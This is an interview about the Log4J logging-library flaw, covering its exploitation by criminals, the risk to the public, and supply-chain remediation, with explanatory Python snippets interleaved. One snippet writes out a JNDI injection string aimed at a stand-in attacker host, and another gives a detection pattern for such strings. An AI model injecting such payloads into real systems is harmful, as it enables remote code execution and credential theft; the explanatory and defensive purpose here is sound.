The Log4J Software Flaw Is ‘Christmas Come Early’ for Cybercriminals

Researchers have just identified a security flaw in a software program called Log4J, widely used by a host of private, commercial and government entities to record details ranging from usernames and passwords to credit card transactions. Since the glitch was found last weekend, the cybersecurity community has been scrambling to protect applications, services, infrastructure and even Internet of Things devices from criminals—who are already taking advantage of the vulnerability.

“For cybercriminals this is Christmas come early, because the sky’s the limit,” says Theresa Payton, a former White House chief information officer and the CEO of Fortalice Solutions, a cybersecurity consulting company. “They’re really only limited by their imagination, their technical know-how and their own ability to exploit this flaw.” Payton spoke with Scientific American about what Log4J does, how criminals can use its newly discovered weakness, and what it will take to repair the problem.

[An edited transcript of the interview follows.]

What is Log4J, and how is it used?

In both technology and cybersecurity teams, everybody needs really good logs. You need logging for audit trails, in the event of a ransomware event, to do forensics, sometimes for regulatory considerations. And so [Log4J] is a Java feature and function where you log things. You could log the fact that somebody used this particular type of credit card, you could log the fact that somebody just logged in today, any number of different types of events could be captured.
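
To make the idea concrete, here is a simplified sketch of audit-style event logging (the event names and field layout are hypothetical illustrations, not actual Log4J code): each event a developer chooses to record becomes one line in a log.

```python
# Simplified sketch of audit-style event logging -- hypothetical
# event names, not actual Log4J code. Each recorded event becomes
# one line in the audit trail.
log_lines = []

def log_event(event, **fields):
    # Render the event and its fields as a single log line.
    line = event + " " + " ".join(f"{k}={v}" for k, v in sorted(fields.items()))
    log_lines.append(line)
    return line

# The kinds of events described above: a login, a payment.
log_event("login", user="alice")
log_event("payment", amount="19.99", card_last4="4242")
```

What ends up in the log, and whether it is encrypted, is entirely up to how the developer uses the logging feature.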

But Log4J has a major security flaw.

This type of vulnerability means somebody can inject instructions into the logs and make the logs do anything they want them to do. Researchers discovered this vulnerability—and I always say thank goodness for the researchers—in early December. Basically, it allows an attacker to have unauthenticated remote code access to the servers. So they can send instructions, they can execute things, and potentially do it completely undetected. There have already been examples of attackers leveraging the Log4J vulnerability. They’ve installed cryptocurrency mining malware on unwitting users’ machines. And if we recall the Internet of Things devices that were taken over by the Mirai botnet, the operators of that botnet also look like they’re attempting to leverage it.
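
The mechanism behind the flaw can be sketched in simplified form (this is an illustration, not Log4J’s actual implementation): the logger expands `${...}` lookup tokens found inside logged messages, so an attacker who gets a string like `${jndi:ldap://attacker.example/x}` recorded in a log can make the logging code itself reach out to an attacker-controlled server.

```python
import re

# Simplified sketch of the lookup-expansion behavior behind the
# flaw (not Log4J's actual implementation). The logger substitutes
# ${...} tokens inside the message itself, so attacker-supplied
# input gets interpreted rather than merely recorded.
LOOKUP = re.compile(r"\$\{([^}]*)\}")

def resolve(token):
    # Stand-in for Log4J's lookup plugins. In the real library, a
    # jndi: lookup would contact the named server, which could hand
    # back code to load and run -- that is the vulnerability.
    if token.startswith("jndi:"):
        return f"<fetched from {token[5:]}>"
    return "<unknown lookup>"

def log(message):
    # Vulnerable behavior: expand lookups inside logged text.
    return LOOKUP.sub(lambda m: resolve(m.group(1)), message)

# A benign log line passes through unchanged:
print(log("user alice logged in"))
# Attacker-controlled input triggers a lookup instead:
print(log("user ${jndi:ldap://attacker.example/x} logged in"))
```

The fix in patched versions of the library is essentially to stop performing this kind of expansion on message content.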

What else can cybercriminals do with this vulnerability?

Because it’s logging, you could potentially inject an instruction to say, “When you log in credentials for a user, also send them over here.” And “over here” will be a place the cybercriminal has set up to capture the login credentials. You can almost create your own cybercriminal command and control of logs. Logs can capture almost anything: logins, credit card information, payment information. It just depends on how a developer decided to use that feature and functionality of logging: what kind of data is in that log, and whether or not it’s encrypted. The question is, are there different safeguards put around the logging? And are there any types of monitoring around logging to see whether or not the logging itself shows anomalous behavior? If an organization isn’t looking for anomalous behavior, they’re not going to notice that, once a user ID and password get logged, they also went somewhere else.
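
As a rough illustration of the kind of monitoring described above (a hypothetical check and sample entries, not a complete defense), a defender can scan log entries for lookup patterns that should never appear in legitimate user-supplied data:

```python
import re

# Hypothetical anomaly check -- a sketch, not a complete defense.
# Flag log entries containing ${...} lookup patterns, which should
# never appear in legitimate usernames or payment fields. The
# second alternative catches one common URL-encoded obfuscation.
SUSPICIOUS = re.compile(r"\$\{.*?\}|%24%7b", re.IGNORECASE)

def is_suspicious(entry):
    return bool(SUSPICIOUS.search(entry))

entries = [
    "login user=alice",
    "login user=${jndi:ldap://attacker.example/a}",
    "login user=%24%7Bjndi...%7D",  # URL-encoded variant
]
flagged = [e for e in entries if is_suspicious(e)]
```

Real attackers nest and obfuscate these tokens in many ways, so pattern matching like this is only a first-pass signal, not a substitute for patching.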

On the security team side of things—as we’re all racing against the clock to find, patch, remediate, observe, log and try to fix these issues—cybercriminals will be taking advantage of the vulnerability. Cybercriminals tend to share and create different attacks. There will most likely be crimeware as a service that will be made available to cybercriminals and nontechnical people to take advantage of.

What does this mean for people who do not work in cybersecurity, but who use applications and services as part of daily life?

You could potentially find out that you were the victim of identity theft. You could potentially go to log in—to get service from any number of companies that you do business with—and find out they’ve got an outage, and they could be dealing with this issue. You might try to contact a government organization to check on a refund or pay a tax and not be able to, because somebody compromised them through this particular vulnerability.

It’s just hard to say exactly how this is going to play out, because we’re still in the early days of really understanding. This has the potential for a very long tail, to be a problem for a long period of time. This is not “patch everything this weekend, and then we all get to go back to Christmas vacation.”

What needs to be done to fix this problem?

I like to use the analogy of a construction nail, [which] could be used in a house, a building, a bridge. Now imagine somebody were to say, “We just realized all of these construction nails have a vulnerability, and they could be rendered inoperable at any moment.” There are lots of different types of construction nails, but you have to go figure out where you used this nail. And now we’re asking construction companies to find and replace the nails before they fail.

You have large companies and sets of infrastructure that have now got to go on this fact-finding hunt [for Log4J in their systems]. A lot of times people don’t sit down and do a detailed blueprint. Getting an accurate inventory of where this logging feature has been deployed within your code means finding lots of needles in lots of different haystacks. Typically, when we have a security vulnerability like this, the security officer can take charge and say, “I’m going to own this, and I’m going to own the remediation effort.” This is different, because it’s supply chain: a lot of people use open source, they use third-party vendors, they use offshore development and widgets, and all of [these software sources] could potentially have Log4J. The supply chain just for one Internet of Things device—think Alexa [or] Google Home—could have anywhere from 10 to 50 to 60 different companies making the different pieces and parts: the firmware, the operating system, and the development of the apps. Just trying to remediate that for one product could be an incredibly onerous task.

What lessons can we learn from this vulnerability?

If you think about SolarWinds, which was another supply chain issue around this time last year, a lot of people said, “Oh, we don’t use the product, so therefore, we’re probably okay.” And what we learned was, if you’re in an ecosystem that has SolarWinds, you have to take remediation steps. You need to find out from your in-house, offshore, near-shore and outsourced developers how they are doing an inventory. We learned the hard way that compiling software and doing quality assurance of software builds is very complex and hard to do, and not always followed down to the nitty-gritty details.

A big lesson learned is, we have chinks in the armor of the supply chain, and we will continue to have them. This will not be the last one of these issues. How do you make sure you have a playbook where, when these issues arise, you can pull the right players together to get an assessment: “Is this really bad, or is this a nothingburger for our organization, and we’re going to be okay?” The second thing that people need to be thinking about here is, what other fail-safes do you have in place? For example, if an attacker takes advantage before you get to patch—and they are commandeering your logging and the information in the logs—could you detect them hiding their traffic? Those are all the lessons learned, and they’re hard lessons. I mean, if they were easy to do, businesses would do them; governments would do them. It sounds great on paper—but it’s really hard, in practice, to implement.